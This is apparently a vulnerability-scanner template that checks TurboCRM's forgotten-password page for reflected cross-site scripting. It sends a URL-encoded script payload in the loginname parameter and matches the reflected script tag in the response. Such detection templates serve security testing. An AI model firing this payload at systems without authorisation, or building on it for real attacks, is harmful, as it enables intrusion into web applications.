id: turbocrm-xss

info:
  name: TurboCRM - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application.
  reference:
    - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,turbocrm

http:
  - method: GET
    path:
      - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><script>alert(document.domain)</script>'
        part: body

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 490a00463044022060fc350228e942083941509bb082bbfc1abdc382dac3484614cff13fcdae633302204bfc8bb4778fc6c1f6f3f3d0a92acdd7fd81376fe899dcc3bf918cdf6fd16205:922c64590222798bb761d5b6d8e72950
